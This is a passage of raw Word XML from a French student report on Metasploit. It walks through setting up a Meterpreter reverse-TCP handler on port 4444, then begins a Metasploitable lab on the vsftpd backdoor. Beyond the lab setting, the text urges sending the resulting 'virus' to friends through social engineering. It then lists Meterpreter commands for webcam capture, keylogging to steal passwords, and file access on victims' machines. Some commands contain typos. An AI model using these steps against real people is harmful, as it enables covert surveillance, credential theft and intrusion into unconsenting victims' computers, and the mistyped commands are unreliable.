      </w:pPr>
      <w:r w:rsidRPr="00742784">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00742784">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00742784">
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidR="0077651C" w:rsidRPr="00742784">
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00742784">
        <w:t>ésultat de la commande</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A95947" w14:textId="3E5A06A6" w:rsidR="00EE1788" w:rsidRPr="00742784" w:rsidRDefault="00EE1788" w:rsidP="00D6524A">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742784">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Entrons maintenant la commande </w:t>
      </w:r>
      <w:r w:rsidR="00242D47">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">suivante </w:t>
      </w:r>
      <w:r w:rsidRPr="00742784">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED6CFDE" w14:textId="0BEAD4C4" w:rsidR="00EE1788" w:rsidRDefault="00574E4E" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r w:rsidRPr="00574E4E">
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00574E4E">
        <w:t>mulit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00574E4E">
        <w:t>/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F507C8" w14:textId="6F1C266A" w:rsidR="00742784" w:rsidRDefault="00742784" w:rsidP="00D6524A">
      <w:r>
        <w:t>Puis on peut utiliser la commande suivante </w:t>
      </w:r>
      <w:r w:rsidR="00D65F18">
        <w:t xml:space="preserve">pour installer le payload </w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501F0FF8" w14:textId="72D736A7" w:rsidR="00445939" w:rsidRPr="00445939" w:rsidRDefault="00445939" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00445939">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Set PAYLOAD windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00445939">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00445939">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00445939">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E1E1B9B" w14:textId="77777777" w:rsidR="00445939" w:rsidRDefault="00445939" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r w:rsidRPr="00445939">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AD54E3C" wp14:editId="1D66A2AB">
            <wp:extent cx="5760720" cy="615950"/>
            <wp:effectExtent l="0" t="0" r="5080" b="6350"/>
            <wp:docPr id="7857121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12176" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="615950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E94608" w14:textId="7B0DF937" w:rsidR="00445939" w:rsidRPr="00D6524A" w:rsidRDefault="00445939" w:rsidP="00242D47">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D6524A">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D6524A">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D6524A">
        <w:t xml:space="preserve"> : Mise en place du payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533427E1" w14:textId="0664BFB6" w:rsidR="00D6524A" w:rsidRPr="00D6524A" w:rsidRDefault="00D6524A" w:rsidP="00D6524A">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D6524A">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>N’oublions pas que LHOST est notre adresse IP, et pour l’avoir nous pouvons util</w:t>
      </w:r>
      <w:r w:rsidR="00BA6194">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidRPr="00D6524A">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">er la commande suivante : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6DBE32" w14:textId="1F639C9A" w:rsidR="00D6524A" w:rsidRPr="00BA6194" w:rsidRDefault="00D6524A" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r w:rsidRPr="00BA6194">
        <w:t xml:space="preserve">Ipconfig </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA6194">
        <w:t>getifaddr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA6194">
        <w:t xml:space="preserve"> en0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083DD2E6" w14:textId="77777777" w:rsidR="00742784" w:rsidRPr="00BA6194" w:rsidRDefault="00742784" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E64E8D2" w14:textId="7E1CED6B" w:rsidR="007D6673" w:rsidRDefault="00BA6194" w:rsidP="00BA6194">
      <w:r w:rsidRPr="00BA6194">
        <w:t>Maintenant, settons notre adresse IP</w:t>
      </w:r>
      <w:r>
        <w:t> avec la commande :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29099D4F" w14:textId="03EB6B47" w:rsidR="0077651C" w:rsidRDefault="00021103" w:rsidP="00BA6194">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00BA6194" w:rsidRPr="00BA6194">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">et LHOST </w:t>
      </w:r>
      <w:r w:rsidR="00BA6194" w:rsidRPr="00BA6194">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>VOTREADRESSEIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C8AC56" w14:textId="77777777" w:rsidR="00BA6194" w:rsidRPr="00BA6194" w:rsidRDefault="00BA6194" w:rsidP="00BA6194">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ECB7FFA" w14:textId="0EF2A5F7" w:rsidR="009B56EB" w:rsidRDefault="00021103" w:rsidP="00D6524A">
      <w:r>
        <w:t>Et notre port à 4444 :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB0A7BF" w14:textId="38A2B99E" w:rsidR="00021103" w:rsidRPr="00BA6194" w:rsidRDefault="00021103" w:rsidP="00021103">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r>
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389F90C8" w14:textId="479ABB4D" w:rsidR="005703C0" w:rsidRPr="00BA6194" w:rsidRDefault="005703C0" w:rsidP="00D6524A"/>
    <w:p w14:paraId="7AB410CC" w14:textId="77777777" w:rsidR="00D31C42" w:rsidRDefault="00D31C42" w:rsidP="00D31C42">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00D31C42">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74C5A1E6" wp14:editId="7204CBD2">
            <wp:extent cx="5054600" cy="1765300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="133744679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46794" name="Image 1" descr="Une image contenant texte, capture d’écran, Police&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5054600" cy="1765300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04976D3B" w14:textId="4E677A7F" w:rsidR="00FF2862" w:rsidRDefault="00D31C42" w:rsidP="00D31C42">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : mise en place du LHOST et du LPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3EC0A2" w14:textId="77777777" w:rsidR="00DB0F3E" w:rsidRDefault="00DB0F3E" w:rsidP="00D31C42">
      <w:r>
        <w:t>Maintenant, nous pouvons exécuter la commande :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D888D1" w14:textId="77777777" w:rsidR="00DB0F3E" w:rsidRDefault="00DB0F3E" w:rsidP="00D31C42"/>
    <w:p w14:paraId="482FBD17" w14:textId="09E30104" w:rsidR="00DB0F3E" w:rsidRDefault="00DB0F3E" w:rsidP="00DB0F3E">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61016E90" w14:textId="77777777" w:rsidR="00DB0F3E" w:rsidRDefault="00DB0F3E" w:rsidP="00DB0F3E">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F67E16A" w14:textId="7EF5AAEB" w:rsidR="00DB0F3E" w:rsidRDefault="00DB0F3E" w:rsidP="00DB0F3E">
      <w:r>
        <w:t>Ou la commande :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3E3F62" w14:textId="77777777" w:rsidR="00DB0F3E" w:rsidRDefault="00DB0F3E" w:rsidP="00DB0F3E"/>
    <w:p w14:paraId="2FB21B7F" w14:textId="5ED5B0D3" w:rsidR="00DB0F3E" w:rsidRDefault="00DB0F3E" w:rsidP="00DB0F3E">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1467003D" w14:textId="7BAD2DFD" w:rsidR="00D31C42" w:rsidRPr="00D31C42" w:rsidRDefault="009F075E" w:rsidP="00D31C42">
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00DB0F3E">
        <w:t>es deux fonctionnent de la même manière.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033F7C32" w14:textId="77777777" w:rsidR="00D227A8" w:rsidRPr="00BA6194" w:rsidRDefault="00D227A8" w:rsidP="00D6524A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FF87916" w14:textId="20960C2D" w:rsidR="004C1ECC" w:rsidRDefault="009F075E" w:rsidP="00D6524A">
      <w:r>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="00D96FEE">
        <w:t>n peut envoyer le virus à des amis (avec un peu d’ingénierie sociale), attention, je ne prends aucune chose à ma charge si vous faîtes des bêtises avec ce programme.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004C1ECC">
        <w:t>Quand la victime lancera le programme, on pourra voir que Metasploit et Meterpreter vont s’ouvrir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25704C06" w14:textId="77777777" w:rsidR="004C1ECC" w:rsidRDefault="004C1ECC" w:rsidP="00D6524A"/>
    <w:p w14:paraId="5812B185" w14:textId="77777777" w:rsidR="004C1ECC" w:rsidRDefault="004C1ECC" w:rsidP="00D6524A">
      <w:r>
        <w:t>Cela montrera que vous avez bien piraté leurs machines avec succès. Voici quelques choses amusantes que vous pouvez faire avec leurs machines :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71247738" w14:textId="77777777" w:rsidR="00CB1C3E" w:rsidRDefault="00CB1C3E" w:rsidP="00CB1C3E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>prendre des photos depuis la webcam, ou enregistrer des vidéos live.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFE85A0" w14:textId="77777777" w:rsidR="00CB1C3E" w:rsidRDefault="00CB1C3E" w:rsidP="00CB1C3E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enregistrer les frappes du clavier (keylogger)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2558FC5B" w14:textId="77777777" w:rsidR="00CB1C3E" w:rsidRDefault="00CB1C3E" w:rsidP="00CB1C3E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Télécharger ou Uploader des fichiers sur la machine victime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF01E59" w14:textId="77777777" w:rsidR="006C4B31" w:rsidRDefault="00B42D43" w:rsidP="00CB1C3E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Éteindre</w:t>
      </w:r>
      <w:r w:rsidR="00CB1C3E">
        <w:t xml:space="preserve"> ou redémarrer l’ordinateur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236734E1" w14:textId="77777777" w:rsidR="006C4B31" w:rsidRDefault="006C4B31" w:rsidP="006C4B31"/>
    <w:p w14:paraId="40D440D4" w14:textId="77777777" w:rsidR="006C4B31" w:rsidRDefault="006C4B31" w:rsidP="006C4B31">
      <w:r>
        <w:t xml:space="preserve">Pour prendre une photo avec la webcam, vous pouvez entrer la commande : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D100842" w14:textId="77777777" w:rsidR="00813EF0" w:rsidRDefault="00813EF0" w:rsidP="006C4B31">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Webcam_snap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="21ECB53F" w14:textId="77777777" w:rsidR="00813EF0" w:rsidRDefault="00813EF0" w:rsidP="006C4B31">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EC30143" w14:textId="77777777" w:rsidR="00813EF0" w:rsidRDefault="00813EF0" w:rsidP="00813EF0">
      <w:r>
        <w:t>Pour enregistrer les frappes de clavier, on peut entrer la commande :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218EF6BD" w14:textId="77777777" w:rsidR="00D02185" w:rsidRDefault="00D02185" w:rsidP="00813EF0">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keyscan_start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="30AF08AF" w14:textId="77777777" w:rsidR="00EE0F6C" w:rsidRDefault="00EE0F6C" w:rsidP="00D02185"/>
    <w:p w14:paraId="59F9090F" w14:textId="77777777" w:rsidR="005035FD" w:rsidRDefault="009466C1" w:rsidP="00D02185">
      <w:r>
        <w:t>Puis après quelques temps, on peut entrer</w:t>
      </w:r>
      <w:r w:rsidR="005035FD">
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6E9A61" w14:textId="055EC3EB" w:rsidR="005035FD" w:rsidRDefault="00C77159" w:rsidP="005035FD">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="005035FD">
        <w:t>eyscan_stop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="424E7A02" w14:textId="77777777" w:rsidR="005035FD" w:rsidRDefault="005035FD" w:rsidP="005035FD"/>
    <w:p w14:paraId="1EF2754F" w14:textId="77777777" w:rsidR="00C77159" w:rsidRDefault="005035FD" w:rsidP="005035FD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Puis utiliser la commande : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E31A44D" w14:textId="77777777" w:rsidR="00C77159" w:rsidRDefault="00C77159" w:rsidP="00C77159">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keyscan_demp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5342FD28" w14:textId="77777777" w:rsidR="00C77159" w:rsidRDefault="00C77159" w:rsidP="00C77159"/>
    <w:p w14:paraId="10BA71EB" w14:textId="3C5B2100" w:rsidR="00A144BF" w:rsidRPr="004C1ECC" w:rsidRDefault="00C77159" w:rsidP="00C77159">
      <w:r>
        <w:t>Pour voir ce qui a été tapé.</w:t>
      </w:r>
      <w:r w:rsidR="009F075E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Par exemple, un Keylogger est un excellent moyen de pirater un compte, ou de trouver les mots de passes de quelqu’un.</w:t>
      </w:r>
      <w:r w:rsidR="009F075E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Vous pouvez également télécharger ou uploader des fichiers, ou consulter les fichiers de la machine victime.</w:t>
      </w:r>
      <w:r w:rsidR="00A144BF" w:rsidRPr="00BA6194">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA1B5EB" w14:textId="6E2647C9" w:rsidR="00A144BF" w:rsidRPr="009F075E" w:rsidRDefault="009820E0" w:rsidP="00A144BF">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc197957010"/>
      <w:r w:rsidRPr="009F075E">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TP de Gelas et Begin :</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="0A86364B" w14:textId="5325A62C" w:rsidR="009F7C46" w:rsidRDefault="00950CF1" w:rsidP="009F7C46">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>L’objectif ici est de maintenir et de prendre en main les fonctionnalités de base du Framework Metasploit.</w:t>
      </w:r>
      <w:r w:rsidR="00CE5376" w:rsidRPr="00CE5376">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CE5376" w:rsidRPr="00CE5376">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Ce TP est une introduction aux bases de l'utilisatio</w:t>
      </w:r>
      <w:r w:rsidR="003167C8">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>n,</w:t>
      </w:r>
      <w:r w:rsidR="00CE5376" w:rsidRPr="00CE5376">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003167C8">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>à</w:t>
      </w:r>
      <w:r w:rsidR="00CE5376" w:rsidRPr="00CE5376">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> savoir, comment utiliser le Framework et exploiter une vulnérabilité.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D959A32" w14:textId="77777777" w:rsidR="001144B0" w:rsidRDefault="001144B0" w:rsidP="009F7C46">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DD6E757" w14:textId="77777777" w:rsidR="001144B0" w:rsidRPr="001144B0" w:rsidRDefault="001144B0" w:rsidP="001144B0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001144B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Pour les outils que nous allons utiliser : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2875B50C" w14:textId="77777777" w:rsidR="001144B0" w:rsidRDefault="001144B0" w:rsidP="001144B0"/>
    <w:p w14:paraId="46AF48ED" w14:textId="51BEB157" w:rsidR="001144B0" w:rsidRDefault="001144B0" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Une VM Metasploitable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8D9572" w14:textId="77777777" w:rsidR="001144B0" w:rsidRDefault="001144B0" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Une VM Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAB1F17" w14:textId="77777777" w:rsidR="001144B0" w:rsidRDefault="001144B0" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Votre terminal pour pouvoir ping les 2 machines au cas où</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E6B58D" w14:textId="658F5150" w:rsidR="00314E5C" w:rsidRPr="00314E5C" w:rsidRDefault="00314E5C" w:rsidP="001144B0">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc197957011"/>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00314E5C">
        <w:t>Exploit 1 : Exploitation d'une backdoor (vsftpd)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="0CAF842B" w14:textId="77777777" w:rsidR="00314E5C" w:rsidRDefault="00314E5C" w:rsidP="00314E5C">
      <w:r w:rsidRPr="00314E5C">
        <w:t>Relevez le nom et la version du service ftp (21/tcp)</w:t>
      </w:r>
      <w:r>
        <w:t>, pour faire cela on va utiliser la commande :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79272945" w14:textId="77777777" w:rsidR="00314E5C" w:rsidRDefault="00314E5C" w:rsidP="00314E5C">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1342B840" w14:textId="30B05E87" w:rsidR="00314E5C" w:rsidRDefault="00314E5C" w:rsidP="00314E5C">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">vsftpd -v </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506CCD9A" w14:textId="77777777" w:rsidR="00A45B35" w:rsidRPr="00314E5C" w:rsidRDefault="00A45B35" w:rsidP="00314E5C">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FFBF9F6" w14:textId="75C3E0E6" w:rsidR="00A45B35" w:rsidRDefault="00F90DE9" w:rsidP="00A45B35">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00F90DE9">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7697D7E7" wp14:editId="2DA4E1EC">
            <wp:extent cx="2489200" cy="736600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="602886055" name="Image 1" descr="Une image contenant Police,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86055" name="Image 1" descr="Une image contenant Police, texte, capture d’écran, Graphique&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2489200" cy="736600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
